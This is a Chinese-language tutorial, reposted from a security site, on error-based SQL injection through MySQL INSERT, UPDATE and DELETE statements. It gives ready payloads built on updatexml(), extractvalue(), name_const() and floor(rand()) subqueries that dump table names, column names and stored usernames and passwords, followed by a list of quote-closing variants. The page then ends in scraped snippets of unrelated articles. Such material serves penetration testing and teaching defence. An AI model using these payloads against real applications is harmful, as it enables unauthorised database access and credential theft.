利用insert,update和delete注入获取数据

0x00 简介



利用SQL注入获取数据库数据,利用的方法可以大致分为联合查询、报错、布尔盲注以及延时注入,通常这些方法都是基于select查询语句中的SQL注射点来实现的。那么,当我们发现了一个基于insert、update、delete语句的注射点时(比如有的网站会记录用户浏览记录,包括referer、client_ip、user-agent等,还有类似于用户注册、密码修改、信息删除等功能),还可以用如上方法获取我们需要的数据吗?在这里,我们以MYSQL的显错为例,看一下如何在insert、update、delete的注射点中获取我们想要的数据。

0x01 环境搭建



为了更好的演示注射效果,我们先利用下面的语句创建原始数据:

create database newdb;
use newdb;
create table users(
id int(3) not null auto_increment,
username varchar(20) not null,
password varchar(20)  not null,
primary key (id)
);
insert into users values(1,‘Jane‘,‘Eyre‘);

看一下当前数据结构:

0x02 注入语法



因为我们这里是用的显错模式,所以思路就是在insert、update、delete语句中人为构造语法错误,利用如下语句:

insert into users (id, username, password) values (2,‘‘inject here‘‘,‘Olivia‘);
insert into users (id, username, password) values (2,""inject here"",‘Olivia‘);

注意:大家看到本来是要填入username字段的地方,我们填了‘inject here‘和”inject here”两个字段来实现爆错,一个是单引号包含、一个是双引号包含,要根据实际的注入点灵活构造。

0x03 利用updatexml()获取数据



updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。

payload:

or updatexml(1,concat(0x7e,(version())),0) or

Insert:

INSERT INTO users (id, username, password) VALUES (2,‘Olivia‘ or updatexml(1,concat(0x7e,(version())),0) or‘‘, ‘Nervo‘);

Update:

UPDATE users SET password=‘Nicky‘ or updatexml(2,concat(0x7e,(version())),0) or‘‘WHERE id=2 and username=‘Olivia‘;

Delete:

DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or‘‘;

提取数据:

由于篇幅有限,在insert、update、delete用法一致的时候,我会仅以insert为例说明。

所用的payload为:

or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or

获取newdb数据库表名:

获取users表的列名:

利用insert获取users表的数据:

利用delete获取users表的数据:

我们可以用insert、update、delete语句获取到数据库表名、列名,但是不能用update获取当前表的数据:

在这里,为了演示用update获取数据,我们临时再创建一个含有id,name,address的students表,并插入一条数据:

再次利用update获取users表的数据:

如果你碰到一个update的注入并且想获取当前表的数据的话,可用用双查询,我后面会讲到。

0x04 利用extractvalue()获取数据



extractvalue()函数也是MYSQL对XML文档数据进行查询和修改的XPATH函数。

payload:

or extractvalue(1,concat(0x7e,database())) or

Insert:

INSERT INTO users (id, username, password) VALUES (2,‘Olivia‘ or extractvalue(1,concat(0x7e,database())) or‘‘, ‘Nervo‘);

update:

UPDATE users SET password=‘Nicky‘ or extractvalue(1,concat(0x7e,database())) or‘‘ WHERE id=2 and username=‘Nervo‘;

delete:

DELETE FROM users WHERE id=1 or extractvalue(1,concat(0x7e,database())) or‘‘;

提取数据:

同样,在insert、update、delete用法一致的时候,我会仅以insert为例说明。

获取newdb数据库表名:

INSERT INTO users (id, username, password) VALUES (2,‘Olivia‘ or extractvalue(1,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 1,1))) or‘‘, ‘Nervo‘);

获取users表的列名:

INSERT INTO users (id, username, password) VALUES (2,‘Olivia‘ or extractvalue(1,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name=‘users‘ limit 0,1))) or‘‘, ‘Nervo‘);

获取users表的数据:

INSERT INTO users (id, username, password) VALUES (2,‘Olivia‘ or extractvalue(1,concat(0x7e,(SELECT concat_ws(‘:‘,id, username, password) FROM users limit 0,1))) or ‘‘, ‘Nervo‘);

同样,我们可以用insert、update、delete语句获取到数据库表名、列名,但是不能用update获取当前表的数据。

0x05 利用name_const()获取数据



name_const()函数是MYSQL5.0.12版本加入的一个返回给定值的函数。当用来产生一个结果集合列时 , NAME_CONST() 促使该列使用给定名称。

Payload:

or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or

Insert:

INSERT INTO users (id, username, password) VALUES (1,‘Olivia‘ or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or ‘‘,‘Nervo‘);

update:

UPDATE users SET password=‘Nicky‘ or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or ‘‘ WHERE id=2 and username=‘Nervo‘;

delete:

DELETE FROM users WHERE id=1 or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a)or ‘‘;

提取数据:

在最新的MYSQL版本中,使用name_const()函数只能提取到数据库的版本信息。但是在一些比较旧的高于5.0.12(包括5.0.12)的MYSQL版本中,可以进一步提取更多数据。在这里我使用MySQL5.0.45进行演示。

首先,我们做一个简单的SELECT查询,检查我们是否可以提取数据。

INSERT INTO users (id, username, password) VALUES (1,‘Olivia‘ or (SELECT*FROM(SELECT name_const((SELECT 2),1),name_const((SELECT 2),1))a) or ‘‘, ‘Nervo‘);

如果显示ERROR 1210 (HY000): Incorrect arguments to NAME_CONST,那就洗洗睡吧。。

如果显示ERROR 1060 (42S21): Duplicate column name ‘2‘,就可以进一步获取更多数据。

获取newdb数据库表名:

INSERT INTO users (id, username, password) VALUES (1,‘Olivia‘ or (SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1),name_const(( SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1))a) or ‘‘, ‘Nervo‘);

ERROR 1060 (42S21): Duplicate column name ‘users‘

获取users表的列名:

INSERT INTO users (id, username, password) VALUES (1,‘Olivia‘ or (SELECT*FROM(SELECT name_const((SELECT column_name FROM information_schema.columns WHERE table_name=‘users‘ limit 0,1),1),name_const(( SELECT column_name FROM information_schema.columns WHERE table_name=‘users‘ limit 0,1),1))a) or ‘‘, ‘Nervo‘);

ERROR 1060 (42S21): Duplicate column name ‘id‘

获取users表的数据:

INSERT INTO users (id, username, password) VALUES (2,‘Olivia‘ or (SELECT*FROM(SELECT name_const((SELECT concat_ws(0x7e,id, username, password) FROM users limit 0,1),1),name_const(( SELECT concat_ws(0x7e,id, username, password) FROM users limit
0,1),1))a) or ‘‘, ‘Nervo‘);

ERROR 1060 (42S21): Duplicate column name ‘1~Jane~Eyre‘

0x06 利用子查询注入



原理与select查询时的显错注入一致。

Insert:

INSERT INTO users (id, username, password) VALUES (1,‘Olivia‘ or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or‘‘, ‘Nervo‘);

update:

UPDATE users SET password=‘Nicky‘ or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or‘‘ WHERE id=2 and username=‘Nervo‘;

delete:

DELETE FROM users WHERE id=1 or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or‘‘ ;

提取数据:

获取newdb数据库表名:

INSERT INTO users (id, username, password) VALUES (1,‘Olivia‘ or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or ‘‘,‘Nervo‘);

获取users表的列名:

INSERT INTO users (id, username, password) VALUES (1, ‘Olivia‘ or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns WHERE table_schema=database() AND table_name=‘users‘ LIMIT 0,1)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or ‘‘, ‘Nervo‘);

获取users表的数据:

INSERT INTO users (id, username, password) VALUES (1, ‘Olivia‘ or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT concat(0x7e,0x27,cast(users.username as char),0x27,0x7e) FROM `newdb`.users LIMIT 0,1) ) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or ‘‘, ‘Nervo‘);

0x07 更多闭合变种


‘ or (payload) or ‘
‘ and (payload) and ‘
‘ or (payload) and ‘
‘ or (payload) and ‘=‘
‘* (payload) *‘
‘ or (payload) and ‘
" – (payload) – "

0x08 引用



http://dev.mysql.com/

http://websec.ca/kb/sql_injection

from:http://www.exploit-db.com/wp-content/themes/exploit/docs/33253.pdf

转自:http://drops.wooyun.org/tips/2078

时间: 2024-10-05 13:27:44

利用insert,update和delete注入获取数据的相关文章

MyBatis XML 映射器 select、insert update 和 delete、参数

MyBatis 的真正强大在于它的语句映射,这是它的魔力所在. 如果跟JDBC 代码进行对比,省掉了将近 95% 的代码. 1 selectCREATE TABLE person (id int(11) NOT NULL AUTO_INCREMENT,username varchar(100) DEFAULT NULL,password varchar(100) DEFAULT NULL,full_name varchar(100) DEFAULT NULL,first_name varchar

利用window.name+iframe跨域获取数据详解

详解 前文提到用jsonp的方式来跨域获取数据,本文为大家介绍下如何利用window.name+iframe跨域获取数据. 首先我们要简单了解下window.name和iframe的相关知识.iframe是html的一个标签,可以在网页中创建内联框架,有个src属性(指向文件地址,html.php等)可以选择内联框架的内容,可以看个例子(猛戳这里),大概了解下就行了.window.name(一般在js代码里出现)的值不是一个普通的全局变量,而是当前窗口的名字,这里要注意的是每个iframe都有包

ORA-06547: INSERT, UPDATE 或 DELETE 语句必须使用 RETURNING 子句

产生这个错误的原因: returning into子句作用于insert,update,delete,上而select则不行,应该用into. 报错的存储如下: create or replace procedure p_stu_info(s_id number, s_name varchar2) is v_name varchar2(10); v_age number; v_ErrMsg varchar2(200); begin execute immediate 'select name,a

利用ceye中的dns来获取数据

安恒杯的一道命令执行题目 查看,存在robots.txt文件 查看index.txt文件,存在where_is_flag.php文件 使用cat没有任何回显 可以使用ceye平台利用dns记录内容,网址http://ceye.io 需要使用sed去除空格和换行 原文地址:https://www.cnblogs.com/hell0w/p/8519681.html

Mysql 下 Insert、Update、Delete、Order By、Group By注入

Insert: 语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....) 报错注入: insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '', 'Nervo'); insert into test(id,name,pass) values (6,'xiaozi' or extract

SQL Server下ADO.NET 怎么获取数据库SQL语句INSERT,UPDATE,DELETE了多少行数据

ADO.NET 在发送SQL语句到SQL Server数据库后,怎么知道真正INSERT,UPDATE,DELETE了多少行数据呢? 使用SQL Server内置的全局变量@@ROWCOUNT即可,@@ROWCOUNT可以返回在当前数据库连接(SqlConnection)中,执行的上一条SQL语句影响了多少行数据,使用示例如下所示: INSERT INTO [dbo].[Person]([PersonCode],[Name],[Age],[City]) VALUES (N'P8000',N'He

LINQ体验(9)——LINQ to SQL语句之Insert/Update/Delete操作

我们继续讲解LINQ to SQL语句,这篇我们来讨论Insert/Update/Delete操作.这个在我们的程序中最为常用了.我们直接看例子. Insert/Update/Delete操作 插入(Insert) 1.简单形式 说明:new一个对象,使用InsertOnSubmit方法将其加入到对应的集合中,使用SubmitChanges()提交到数据库. NorthwindDataContext db = new NorthwindDataContext(); var newCustomer

深入浅出Mybatis系列(七)---mapper映射文件配置之insert、update、delete[转]

上篇文章<深入浅出Mybatis系列(六)---objectFactory.plugins.mappers简介与配置>简单地给mybatis的配置画上了一个句号.那么从本篇文章开始,将会介绍mapper映射文件的配置, 这是mybatis的核心之一,一定要学好.在mapper文件中,以mapper作为根节点,其下面可以配置的元素节点有: select, insert, update, delete, cache, cache-ref, resultMap, sql . 本篇文章将简单介绍 in

mybatis insert、update 、delete默认返回值解释与如何设置返回表主键

在使用mybatis做持久层时,insert.update.delete,sql语句默认是不返回被操作记录主键的,而是返回被操作记录条数: 那么如果想要得到被操作记录的主键,可以通过下面的配置方式获取. 针对Sequence主键而言,在执行insert sql前必须指定一个主键值给要插入的记录,如Oracle.DB2,可以采用如下配置方式: <insert id="save" parameterType="user"> <selectKey res